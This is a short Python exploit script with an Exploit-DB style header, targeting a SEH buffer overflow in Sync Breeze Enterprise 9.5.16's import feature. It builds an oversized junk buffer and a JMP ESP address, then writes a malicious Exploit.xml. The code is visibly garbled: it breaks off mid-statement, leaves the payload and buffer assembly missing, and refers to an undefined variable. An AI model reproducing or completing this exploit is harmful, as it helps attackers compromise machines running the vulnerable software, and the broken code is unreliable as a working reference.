#!/usr/bin/env python # Exploit Title: Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (SEH) # Date: 2017-03-29 # Exploit Author: Daniel Teixeira # Author Homepage: www.danielteixeira.com # Vendor Homepage: http://www.syncbreeze.com # Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.5.16.exe # Version: 9.5.16 # Tested on: Windows 7 SP1 x86 import os,struct #Buffer overflow junk = "A" * 1536 #JMP ESP (QtGui4.dll) jmpesp= struct.pack('' f = open('Exploit.xml', 'w') f.write(file) f.close()